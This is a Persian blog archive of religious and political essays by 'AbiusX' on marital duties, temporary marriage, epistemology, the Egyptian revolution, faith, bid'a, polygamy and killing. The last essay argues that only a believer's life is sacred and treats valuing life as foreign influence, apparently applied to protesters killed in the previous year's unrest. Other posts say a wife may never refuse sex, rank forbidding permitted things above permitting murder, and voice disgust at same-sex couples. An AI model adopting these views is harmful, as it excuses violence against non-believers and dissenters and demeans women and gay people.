چند وقت پیش مطلبی در این باب شنیدم و بررسی‌هایی هم کردم، و بعد که به سراغ اینترنت و سایت‌های به اصطلاح آخوندی رفتم و دنبال وظایف زن و مرد در زندگی زناشویی گشتم، غیر از قصه و توصیه و عقاید شخصی چیزی گیرم نیامد. هرکسی زحمت کشیده بود یک مشت حدیث لیست کرده بود که معلوم نبود درست باشند یا نه و یک سری نتیجه مشکوک تر از حدیث از آنها گرفته بود و یک طومار وظایف تافته بود. لذا تصمیم گرفتم به صورت دقیق و قطعی، همانگونه که شایسته مکتب عدلیه (شیعه)‌است و برعکس نوشته‌های دیمی و غیر دقیق و روی هوا که باعث شک و تردید و تفرقه می‌شود، این بحث رو که بسیار کوتاه هم هست بنویسم، چون احساس می‌کنم برای هرکسی که می‌خواهد ازدواجی اسلامی داشته باشد، دانستن این مطلب بسیار بسیار مهم است و می‌بینم افرادی رو که به خاطر ندانستن این موضوع به خاکی زده‌اند. وظایف قطعی مرد در قبال زن در زندگی زناشویی:

نفقه، شامل (خوراک، پوشاک، مسکن)‌در حد شانیت زن: توجه داشته باشید که اگر مثلا زنی از یک خانواده ثروتمند بگیرد، باید در حد شان همان زن و همان خانواده نفقه برای زن تامین کند و این وظیفه اوست (اگر نتواند قصور کرده است). نفقه توسط مرد برای زن هزینه می‌شود و جزو مایملک زن تلقی می‌گردد.

نگهداری و تربیت فرزندان: تعجب نکنید، این هم وظیفه مرد است هرچند معمولا خانم‌ها انجام می‌دهند. به دلیل همین وظیفه هم هست که حضانت فرزند متعلق به مرد است.

نگهداری و رتق و فتق خانه: بله این هم وظیفه مرد است. به همین دلیل است که زن می‌تواند برای هرکاری که در منزل انجام می‌دهد، طلب مزد کند و یا انجام ندهد.

تمکین نسبی: مرد وظیفه دارد که از شب‌های خود قسمتی را حتما به همسر خود اختصاص دهد و پیش او باشد. همچنین مرد وظیفه دارد در هر مدت (حدود عرفی چند ماه) حداقل یکبار خود را از همسرش دریغ نکند.

وظایف قطعی زن در قبال مرد در زندگی زناشویی:

تمکین : تنها وظیفه زن در قبال مرد در زندگی زناشویی تمکین است. تمکین در اصطلاح فقهی یعنی هرموقع مرد از زن درخواست همبستری کرد، زن نباید رد کند (مگر اینکه عذر قطعی داشته باشد).

توجه داشته باشید که از نظر اسلام، وظایف زن و مرد در زندگی زناشویی فقط همانست که در بالا بیان شد، اما از آنجایی که زندگی زناشویی بر عاطفه و محبت استوار است و نه بر قانون (بر عکس خانواده قانونمند و خشک غربی) معمولا زنها که عاطفی‌تر هستند بسیار بیشتر فداکاری می‌کنند. فراموش نکنیم که این فداکاری در طی تاریخ به عرفی تبدیل گشته که وظایف زن را آنچنان دستخوش تغییر کرده که تصویر همگی ما از زندگی زناشویی و وظایف زن و شوهر و باالتبع آن قوانین حوزه زناشویی، جابجا شده است.

متعه از دیدگاه قرآن

AbiusX — Thu, 21 Apr 2011 21:50:47 +0000
یک تحقیق جمع و جوری انجام دادم در باب اثبات اینکه متعه جایز و حلاله برای نقطه شروع. بعد از اینکه حلت اثبات شد به ویژگی‌ها و شرایط بهتر می‌شه پرداخت. اگر دوستان مایل بودند مطلب رو منتشر کنند که دیگران هم استفاده کنند. ممنون
http://abiusx.com/archive/html/mut’a.html

معرفت / استدلال

AbiusX — Thu, 07 Apr 2011 21:14:26 +0000
علم (که در این مطلب به معرفت و شناخت اشاره دارد) از چند طریق به دست می‌آید؛ از میان آنها تنها به علم حصولی خواهیم پرداخت و علم‌هایی که به گونه‌های دیگر (مانند وحی و غیره)‌به دست می‌آیند بررسی نمی‌کنیم. انواع استدلال علم به طور کلی از راه استدلال به دست می‌آید، بنابراین نظریه‌هایی که از وهم ناشی می‌شوند علم نمی‌نامیم. (قسمت عمده‌ای از خلاقیت انسانی از قوه وهم بهره می‌گیرد). استدلال نیز به سه دسته زیر تقسیم می‌گردد:

استنتاج ( به طور دقیقتر کسر) Deduction

استقرا Induction

استنتاج Inference

متاسفانه در واژگان فارسی هر سه این لغات به قیاس یا استنتاج ترجمه می‌شوند. کسر یعنی از یک حکم جامع و شامل به یک حکم جزئی‌تر رسیدن، از علت به معلول رسیدن (ترجمه لغوی)؛ مثلا اگر افتاب بتابد هوا گرم می‌شود. استقرا یعنی از جزء به کل رسیدن. مثلا اگر به صد پرنده سنگ پرت کنی فرار کنند، نتیجه می‌گیری به صد و یکمی هم سنگ پرت کنی فرار می‌کند. (استقرای ریاضی با استقرا تفاوت دارد و یک نوع کسر است). اما استنتاج (Inference) یعنی در عرض جلو رفتن. به عنوان مثال اگر a=b , b=c استنتاج می‌کنیم که a=c. این حکم را به دست نیاورده‌ایم، موجود بوده و تنها آنرا به لیست احکام اضافه کردیم. (تا حدودی شبیه کسر) جالب توجه آنکه ذهن انسان قسمت عمده زمان تفکر و تعقل را صرف استنتاج می‌کند تا از چیزهایی که می‌داند به ظاهر چیزهایی جدیدی یاد بگیرد.
معرفت شناسی
پوزیتیویسم، استقرا و آزمایش مکتب پوزیتیویسم (Positivism) که بنیان غرب امروزی بوده و هست، بر مبنای استقرا بنا شده است. در این تفکر، کسر به عنوان روشی برای کسب علم وجود ندارد و تنها از استقرا می‌توان به علم رسید، به همین دلیل است که این مکتب چیزهایی مثل روح و یا دین را به هیچ وجه علم نمی‌داند (زیرا قادر به تجربه کردن و آزمایش و استقرای آن نیست). توجه به این نکته اساسیست که در واقع عملکرد استقرا شبیه‌سازی کسر است، که با ضعف صورت می‌گیرد. به عنوان مثال ما استدلال می‌کنیم که «چون سیب از درخت بر سر نیوتون افتاد، پس نیروی جاذبه در زمین وجود دارد» در حالی که این استدلال نادرست است، زیرا اگر سیب بر سر نیوتون نیافتد هم جاذبه وجود دارد، پس علت وجود جاذبه، افتادن سیب نبوده. در واقع در استقرا سعی داریم بگویم «چون جاذبه وجود دارد سیب از درخت بر سر نیوتون افتاد» اما چون نمی‌توانیم این حکم را ثابت کنیم از نسخه معکوس و نادرست قبلی استفاده می‌کنیم. به همین دلیل است که استقرا معرفت قطعی و جزمی به ما نمی‌دهد و از همین روست که اپیستمولوژی غرب به جایی رسیده که ادعا می‌کند هیچ معرفت قابل اثبات و صحیحی وجود ندارد و هرچیزی که قابل رد کردن و آزمایش کردن نباشد هم علم نیست. کسر و پیش‌نیازهای آن برای آنکه بتوانیم از استدلال کسری استفاده کنیم، باید ابتدا اصول صحیحی را در نظر «فرض» بگیریم که بتوانیم آنها را کسر دهیم و به نتایج و احکام دیگری برسیم. این اصول صحیح را منطق می‌نامیم و آنرا تعریف می‌کنیم « آن چیزی که انسان‌های سالم به صورت مشترک و بدیهی قبول دارند»؛ مثل اینکه جمع نقیضین محال است. در واقع منطق علمی حضوریست که هر انسانی بدون تلاش آنرا درون خود دارد و اگر آنرا نداشته باشیم، امکان بهره گیری از کسر را نیز نخواهیم داشت. پس از فرض گرفتن منطق و اصول آن (محال بودن دور، محال بودن تسلسل، محال بودن جمع نقیضین و …) به ناگه حجم انبوهی از گذاره‌های عقلی مسلم به حوزه احکام اضافه می‌گردند که با تجمیع و کسر آنها می‌توان حجم انبوهی از علم را در دست داشت. اسلام و علم مکتب عدلیه (شیعه) با اتکا به منطق و قائل شدن اعتبار ذاتی برای عقل (انسان با عقل به دنیا می‌آید) به اثبات وجود خدا، صفات وی، معاد، نبوت و … می‌پردازد. تمامی این احکام نیز به صورت کسری اثبات می‌گردند و از استقرا استفاده‌ای نمی‌شود، به همین دلیل این شق از علم مشکوک و نسبی نیست. لازم به ذکر است که علم کسری خصوصا در بین علمای اسلامی تا حدود بسیار زیادی پیش رفته و به قله‌های بسیار مرتفعی رسیده‌است که به دلایل مختلف به اندازه کافی با آن آشنا نیستیم. همین علم کسری نیز باعث دوران طلایی جهان اسلام شد که در ظرف چند صد سال سریعترین رشد علم در کل تاریخ بشر را در جهان اسلام مشاهده کردیم (که بر آشنایان با آن واضح است قابل مقایسه با رشد علم در حال حاضر نبوده است). می‌توان دلیل این امر را اتکای مسلمانان به بخش‌های قطعی از علم دانست که با کسر به دست آمده و باعث شده بودند کاخ علم به سادگی علم شود. (شاید به همین دلیل ایران با رشد متوسط ۱۱ برابر دنیا در تولید علم، در حوزه معرفت‌شناسی و اپیستمولوژی کمتر از میانگین جهان فعالیت داشته است، به علت عدم نیاز)

انقلاب مصر و برخورد صحیح با آن

AbiusX — Sun, 30 Jan 2011 16:08:47 +0000
قلم فرسایی نمی‌کنم، مطلبی راجع به ماهیت انقلاب مصر، تاثیرات احتمالی آن و برخورد صحیح با آن می‌نویسم که برای عزیزانی که اهمیت سیاست را درک می‌کنند بسیار مفید خواهد بود ( انشالله ) اولا که انقلاب مصر حتما به صلاح نخواهد بود، اگر دموکراسی آمریکایی در مصر برقرار بشود قطعا از دیکتاتوری مبارک بدتر خواهد بود و همین دین و ایمانی که مردم دارند نیز بر باد خواهد رفت (زیرا در دیکتاتوری حاکم ظلم می‌کند و مردم مظلوم هستند، اما فساد در سطح مردم نیست و در سطح حکام است ولی در دموکراسی حکام و مردم یکپارچه می‌شوند و اگر حکام فاسد باشند مردم نیز فاسد خواهند بود. توضیحات بیشتر در مطلبی دیگر) ثانیا همانطور که همه می‌دانند، انقلاب مردم مصر رهبری منسجم ندارد و به دلیل انعکاس دومینویی انقلاب‌های تونس و اطراف رخ داده است. این امر بسیار خطرناک است و تا وقتی رهبری برای انقلاب معین نباشد، خط و مشی دقیق آن نیز معلوم نیست و هر جریانی می‌تواند آنرا دستکاری و مصادره کند. ثالثا ۹۰ درصد جمعیت مصر مسلمان هستند و در تصاویر راهپیمایی‌ها بر همه مسلم بود که انقلاب به دست مسلمانان غلیظ در دست انجام است و قشری که حداقل ظاهرا شدیدا مسلمان نباشد در جمعیت دیده نمی‌شد. با این اوصاف تمام جریانات مختلف، خیز برداشته‌اند تا از آب گلالود ماهی بگیرند و انقلاب مصر را به نفع خود مصادره کنند. آمریکا با رهبر نشان دادن البرادعی و اعلام دروغین اینکه او تحت فشار است که رهبری را به دست نگیرد، عربستان با حمایت از دولت جاری، ایران و اسرائیل با سکوت و هر جریان دیگری به نوبه خود. اما نباید تمام تحلیلات را به موسسه‌های آمریکایی قدرتمند مانند RAND بسپاریم که اگر اینگونه عمل کنیم نتیجه نیز از آن آنان خواهد بود. در این میان جریان موسوم به جنبش سبز قصد برگزاری تجمعی در ایران را دارد، غافل از اینکه این خط از آمریکا منشاء گرفته تا نه تنها انقلاب مصر را به جنبش سبز پیوند زند و ماهیت آندو را به جهانیان یکسان نمایان کند، بلکه افکار عمومی را از التهاب مصر کمی دور کند. اما ایران نیز به دلیل حساسیت موضوع امکان هیچگونه اعلام نظر رسمی سیاسی ندارد که جریانات مخالف به شدت منتظر این عکس العمل هستند تا تحرکات مصر را گردن ایران و عوامل جاسوسی آن بیاندازند و بار دیگر ما را تروریست و دشمن ملت‌ها معرفی کنند. از طرف دیگر در صورتی که ایران هیچ موضعی نگیرد، چگونه می‌تواند جریان را به نفع خود مصادره نماید؟ راه حلی که به نظر من رسید اینست که تظاهرات مردمی گسترده‌ای، بدون پوشش دولتی در ایران در پشتیبانی از انقلاب مصر برگزار شود. بدینسان نه تنها ماهیت انقلاب مصر به ماهیت انقلاب اسلامی تغییر خواهد کرد بلکه این انقلاب برای ایران و مردم و راه آن مصادره خواهد شد و در صورتی که مصر انقلاب اسلامی کند و به جبهه ایران بپیوندد، اسرائیل در آینده نزدیک و آمریکا در آینده دور از صحنه حذف خواهند شد.

تعریف ایمان در ادیان

AbiusX — Sat, 29 Jan 2011 19:25:04 +0000
مطلب بسیار کوتاهی در خدمت شما هستم در باب تعریف ایمان در ادیان. ایمان یا Faith در ادیان غربی و سکولار امروزی (مسیحیت، یهودیت و …) تعریف زیر را دارد:
strong belief in God or in the doctrines of a religion, based on spiritual apprehension rather than proof.

یعنی

باور قوی در خداوند یا مذهب یک دین، بر اساس درک معنوی به جای استدلال و برهان

(بر اساس New Oxford American Dictionary)

و اما در اسلام، ایمان به چه معناست؟ بحث‌های فلسفی بسیاری در این باب رخ داده که عصاره آن به شرح زیر است:
(لا إِکْراهَ فِی الدِّینِ قَدْ تَبَیَّنَ الرُّشْدُ مِنَ الْغَیِّ فَمَنْ یَکْفُرْ بِالطَّاغُوتِ وَ یُؤْمِنْ بِاللَّهِ فَقَدِ اسْتَمْسَکَ بِالْعُرْوَةِ الْوُثْقی…);« در دین اجبار نیست. راه هدایت و ضلالت بر همه کس روشن گردید، پس هر که از راه کفر و سرکشی برگردد و به راه ایمان و پرستش خدا گراید، به رشته‌ی محکم و استواری چنگ زده است.» (آیت الکرسی) ایمان تمکّن یافتن اعتقاد در قلب انسان است و از مادّهی امن گرفته شده است. گویا شخص مؤمن، با ایمان، از ریب و شک که آفت اعتقاد است، ایمن میشود. (علامه طباطبایی) ایمان از سنخ اعتقاد و معرفت است، اما صرف معرفت نیست، بلکه باید در قلب انسان وارد شده و عقد ببندد تا عقیده شود. بنابراین معرفت و علم (و عقل) شرط لازم ایمان است ولی کافی نیست. دقت داشته باشید که در بحث‌هایی که از ایدئولوژی‌های غربی به میان میاید، واژه ایمان را معادل Faith بگیرید و نه ایمان اسلامی.

بدعت، بدعت!

AbiusX — Wed, 12 Jan 2011 22:32:53 +0000
بدعت یعنی تحریف دین، و به عبارت دقیقتر یعنی اضافه کردن چیزی که در دین نیست به آن و حذف کردن چیزی که در دین است از آن. در این مطلب بدعت رو محدود می‌کنم به دو دسته، حلال کردن حرام خدا و حرام کردن حلال خدا. اما سوالی که قصد بررسی داریم، اینست:
حرام کردن حلال خدا بدتر است یا حلال کردن حرام خدا؟

در نگاه اول، ممکن است بگوییم حلال کردن حرام خدا خیلی بدتر است چون باعث شیوع گناهی می‌شود که روح‌ها را تباه می‌سازد، اما حرام کردن حلال خدا شاید خیلی بد نباشد، چون به مانند احتیاط است و از چیزی که حلال است استفاده نکنیم، حداقل گناه نکرده‌ایم و الکی سختی اضافه کشیده‌ایم. اما این دیدگاه نقاط ضعفی دارد.

برای دریافت پاسخ دقیق این سوال، باید به سوالی بنیادین که متکلمین اسلامی از ابتدا تاکنون پاسخ‌های مختلفی بدان داده‌اند، پاسخ بگوییم و آن سوال اینست که «همه چیز حلال است، مگر آنهایی که حرام اعلام شده‌اند یا بالعکس؟» باور بنده اینست که حالت اول برقرار است و بر این اساس به سوال اولیه پاسخ خواهم داد.

مواردی که حلال هستند، به دو دسته تقسیم می‌شوند:

لازم

غیرلازم

حلال‌های لازم، مثل غذا خوردن (با محدودیت‌هایی، ولی کلیت آن)، مثل ازدواج کردن، مثل تفریح کردن و غیره هستند که برای زندگی یک انسان لازم هستند و اگر اینها حرام باشند، نمی‌شود زندگی کرد. حلال‌های غیرلازم، تمامی حلال‌هایی هستند که در این دسته قرار نمی‌گیرند. ما در این مطلب و در کل راه دقیقی برای تمیر این دو دسته ارائه نخواهیم داد و کار را به فیلسوفان، متکلمان و فقها می‌سپاریم. به نظر بنده، حرام کردن حلال‌های لازم، بدترین نوع بدعت است و از حلال کردن حرام‌های بسیار بد، مانند زنا یا قتل هم مضرتر است، به این خاطر که این حلال‌ها برای زندگی یک انسان مومن لازم هستند و در صورتی که اینها امکانپذیر نباشند (و ممنوع شوند)، کلیت دین دیگر امکانپذیر نیست و یک بسته ناقص شده، دینداری در کل ممکن نخواهد بود، بنابراین کل دین از دست خواهد رفت، در حالی که حتی اگر قتل حلال شود، نهایتا ضررهایی متوجه جامعه می‌شود و تا حدودی قابل کنترل خواهد بود (و دیگر گناه‌ها بیشتر ضرر روحی دارند) و همچنین عقل و جامعه بشری می‌تواند آنرا تا حدودی به تعادل نزدیک سازد. متاسفانه اکثر ما بدون دلیل و به زعم اشتباه فکر می‌کنیم که حرام کردن حلال‌ها نوعی تقوای اضافی و ورع است و تنها ضرر آن اینست که بیش از حد احتیاط خواهیم کرد، در حالی که این بدترین نوع بدعت است و باعث از میان رفتن دین خداوند خواهد شد . قطعا به این سادگی هم قابل بخشش نخواهد بود.

چند همسری از منظر حقوق بشر لیبرال

AbiusX — Tue, 04 Jan 2011 23:48:08 +0000
مدتی بود که این مطلب در ذهنم حسابی دعوا راه انداخته بود که آره، چرا منو نمی‌نویسی؟ در حق من ظلم شده! من هم می‌گفتم خیلی‌ها قبل از تو مظلومند! ولی دیروز وقتی فیلم The 8th Mormon Proposition رو دیدم، اولویت این مطلب بالا آمد. در این مطلب راجع به Mormonism و American Constitution و 8th Proposition صحبت نمی‌کنم، هرچند بحثهای حیاتی هستند که حتما باید در مورد آنها تحقیق کنیم. سعی می‌کنم مطلب را طوری بنویسم که وابستگی به اینها پیدا نکند. موضوع امروز، یک بررسی تطبیقی و انتقادی عقلیست، و بر اساس هیچ گزاره عقلی کلامی، عبارتی را تایید یا رد نمی‌کند، تنها سیستم موجود را به چالش می‌کشد و بنیان‌های آنرا بی اساس می‌نماید. همانطور که می‌دانید، ازدواج دو همجنس،‌ در بسیای از ایالات آمریکا و همچنین در درصد قابل توجهی از کشورهای جهان قانونیست، تا جایی که بیش از ۵۰ درصد جمعیت آمریکا به اینگونه ازدواج رای مثبت می‌دهند و آنرا حق طبیعی انسان‌ها می‌دانند. ما نیز قصد نداریم آنرا غلط یا درست بدانیم، هرطوری که هست باشد (هرچند اگر مستندات مربوط به زندگی دو همجنس، چه دو مرد و چه دو زن را مطالعه کنید امکان ندارد حالتان به هم نخورد) و همچنین قصد نداریم دلایل خوبی یا بدی اینکار از نظر عقل و عرف را بررسی کنیم، چه بسا آنکه اینکار در تقریبا تمامی مطالبی که راجع به این موضوع قلم خورده مشخص شده و بر خوانندگان محترم نیز مبرهن است. چند همسری (Polygamy) که به دو دسته چند زنی (Polygyny) و چند شوهری (Plolyandry) تقسیم می‌گردد (هرچند از این پس منظور ما از این اصطلاح چند زنیست و چند شوهری به جز موارد معدودی در کل تاریخ مشاهده نشده و نمی‌شود) نیز در اکثر جوامع و کشورهای دنیا، یا ممنوع است و مجازات قانونی دارد، یا مذموم است و پسندیده نیست، یا ممنوع است ولی پیگیری قانونی نمی‌شود.
چند زن در اندونزی که تحت تاثیر تبلیغات، تظاهرات ضد چند همسری می‌کنند
چرا ازدواج دو همجنس مجاز است؟ آیا صرف اینکه آندو، و حتی جامعه‌شان، به این توافق رسیده‌اند که می‌خواهند و می‌توانند با یکدیگر زندگی کنند این حق را ایجاد کرده است؟ آیا صرف اینکه اینکار هیچ ضرر ظاهری مشخصی ندارد، مجوز آزادی آنرا صادر می‌کند؟ آیا صرف اینکه بین دو همجنس عشق ایجاد شده، مجوز ازدواج است؟ بسیار خوب همه اینها قبول. پس چرا چند همسری مجاز نیست؟ آیا اگر مردی و تعدادی زن به توافق برسند، حق ازدواج ندارند؟ آیا ازدواج یک مرد با چند زن، که از روزهای اولیه پیدایش بشر وجود داشته و هیچموقع نیز با فطرت او ناسازگاری نداشته (و تنها دشمن آن حسادت زنها بوده است) به هیچ صراطی نمی‌تواند مجوز داشته باشد، ولی ازدواج دو مرد یا دو زن که همین الان هم به نظر بسیاری عجیب و نامناسب است، صرف توافق و اعطای حقوق بشر به انسان‌ها، مجاز می‌گردد؟ اصلا چرا ازدواج چند همجنس مجوز ندارد؟؟ حقوق بشر لیبرال، علارغم اینکه بنیان خود را آزادی‌های فردی (و سپس اجتماعی) انسان‌ها بیان می‌کند، در جاهایی که این آزادی با ایدئولوژی و شیوه‌های تسلط آن بر جهان تقابل پیدا می‌کند، خیلی راحت و با جوسازی و ایجاد تبلیغات آنرا نقض می‌نماید، چنانچه امروزه در جامعه آمریکایی بیش از نیمی از مردم موافق ازدواج دو همجنس هستند، ولی بسیار کمتر از یک سوم مردم چند همسری را گزینه‌ای قابل تامل می‌دانند!
تصویری از جوزف اسمیت و همسران، پیامبر دروغین فرقه مورمونیسم (مسیحیت قدیسان جدید)

و تو نباید بکشی…

AbiusX — Thu, 30 Dec 2010 07:55:22 +0000
با یک مطلب کوتاه راجع به قتل نفس از دیدگاه عقل و دین سلسله مباحث را ادامه خواهیم داد. این مطلب را بسیار رک و بدون تفسیر می‌نویسم چون جای مغالطه زیاد خواهد داشت. از دید عقل، قتل در موارد بسیار زیادی لازم است، به عنوان مثال وقتی کسی قصد کشتن شما را می‌کند، و به هیچ طریقی هم دست بردار نیست، و توانایی غلبه و کنترل او را ندارید (مثلا اسلحه به دست رگبار گرفته یا با چاقویی به سمت شما حمله ور شده و شما نیز فنون رزمی نمی‌دانید) قاعدتا باید او را بکشید. یا اگر کسی در حال انجام کاریست که ضرر آن بسیار پر ارزشتر از جان وی است، مثلا در حال نصب و انفجار یک بمب اتمی در شهری پر جمعیت. بنابراین حداقل عقلی آنکه کشتن گاهی لازم و واجب است. و اما کشتن در ادیان، در مذهب یهود و نصارا بر اساس ده فرمانی که به باور امروزی این ادیان خداوند به حضرت موسی (ع) اعطی فرموده، بر اساس ششمین فرمان (و از دید پروتستان‌ها پنجمین) عبارت «Thou shalt not kill» یا «Thou shalt not murder» که نثر قدیمی «تو نباید بکشی» است آمده. بسیاری از کاتولیک‌های مقید باور دارند که تحت هیچ شرایطی نباید اقدام به قتل نفس کرد و به مانند دیگر اعتقادات خود، دلیل و الزام یا رد عقلی بر این موضوع را پذیرا نیستند. در اسلام، بر خلاف یهودیت و مسیحیت، قتل نفس اینگونه تحریم نگشته است. در قرآن ۱۷۳ بار ریشه قتل به کار رفته، که تعداد متنابهی از آن مربوط به مذمت رفتار امت‌های مختلف در قتل پیامبران و یا فرزندانشان است، ولی مواردی نیز مربوط به حکم و حرمت قتل نفس است، که مهمترین آنها عبارتند از:
از اين رو بر بنى اسرائيل مقرر داشتيم كه هر كس كس ديگر را نه به قصاص قتل كسى يا ارتكاب فسادى بر روى زمين بكشد، چنان است كه همه مردم را كشته باشد. و هر كس كه به او حيات بخشد چون كسى است كه همه مردم را حيات بخشيده باشد. و به تحقيق پيامبران ما همراه با دلايل روشن بر آنها مبعوث شدند، باز هم بسيارى از آنها هم چنان بر روى زمين از حد خويش تجاوز مى‏كردند. (مائده، ۳۲)

بگو: «بياييد آنچه را پروردگارتان بر شما حرام كرده است برايتان بخوانم: اينكه چيزى را شريك خدا قرار ندهيد! و به پدر و مادر نيكى كنيد! و فرزندانتان را از (ترس) فقر، نكشيد! ما شما و آنها را روزى مى‏دهيم و نزديك كارهاى زشت نرويد، چه آشكار باشد چه پنهان! و انسانى را كه خداوند محترم شمرده، به قتل نرسانيد! مگر بحق (و از روى استحقاق) اين چيزى است كه خداوند شما را به آن سفارش كرده، شايد درك كنيد! (انعام، ۱۵۱)

و كسى را كه خداوند خونش را حرام شمرده، نكشيد، جز بحق! و آن كس كه مظلوم كشته شده، براى وليش سلطه (و حق قصاص) قرار داديم اما در قتل اسراف نكند، چرا كه او مورد حمايت است! (اسراء، ۳۳)

و كسانى كه معبود ديگرى را با خداوند نمى‏خوانند و انسانى را كه خداوند خونش را حرام شمرده، جز بحق نمى‏كشند و زنا نمى‏كنند و هر كس چنين كند، مجازات سختى خواهد ديد! (فرقان، ۶۸)

و هر كس، فرد باايمانى را از روى عمد به قتل برساند، مجازاتِ او دوزخ است در حالى كه جاودانه در آن مى‏ماند و خداوند بر او غضب مى‏كند و او را از رحمتش دور مى‏سازد و عذاب عظيمى براى او آماده ساخته است. (نساء، ۹۳)

در تفسیر آیه اول، علامه سید محمد حسین طباطبایی می‌فرمایند که بحث کشتن تمام بشریت، تشبیه کناییست و از این منظر است که حقیقت آفرینش را زایل کردن، یک نفر و چند نفر ندارد نه اینکه حکم فقهی باشد و شدت گناه را برساند. بنابراین این آیه در نتیجه‌ای که خواهیم گرفت تاثیرگذاز نیست. آیه آخر نیز قید مومن دارد و بیشتر برای تاکید در باب قصاص آمده است.

در تمام موارد دیگر، و مواردی که موفق به یافتن آنها در قرآن نشدم، همواره قید «کسی که خداوند خونش را حرام شمرده، نکشید» به کار رفته است. یعنی به صورت پیش‌فرض، ریختن خون انسان حرمت ندارد مگر برای مواردی که خداوند حرمتی بر خون قرار داده (مانند آیه آخر). در فهرست گناهان کبیره شهید دستغیب نیز، قتل نفس به عنوان گناه کبیره چهارم بدین صورت آمده است « آدمکشی، کشتن کسی که خدایتعالی کشتن او را تحریم کرده و خونش را محترم دانسته مگر آن که جنبه قصاص و اجراء حدود الهی داشته باشد»

بنابراین از دیدگاه اسلام، ریختن خون یک انسان صرفا اتفاقی بسیار بزرگ نیست که دنیا را تکان دهد و تعادل محورها را تغییر دهد. برای اینکه اینگونه باشد، شرایط و قیود بسیاری باید بر آن انسان حاکم باشند، به عنوان مثال باید مصداق «مومن» باشد.

متاسفانه باور غلطی که از مسیحیت و یهودیت، و تا حدودی از بودائیسم و تائوییسم و از طرفی دیگر از لیبرالیزم و اومانیزم – به دلیل غایت شمردن جان انسان – وارد اذهان مردم ما شده (صرفا به جهت تهاجم فرهنگی) باعث شده که حرمت غیرواقعی و بزرگی برای کشته شدن انسان‌ها قائل باشند که نمونه‌های گمراهی افراد بسیاری را بر اثر این باور اشتباه در فتنه سال گذشته شاهد بودیم. امید است که با مطالعه این مطلب، میزان تشخیص عزیزان حداقل در این یک حوزه تنظیم گشته باشد.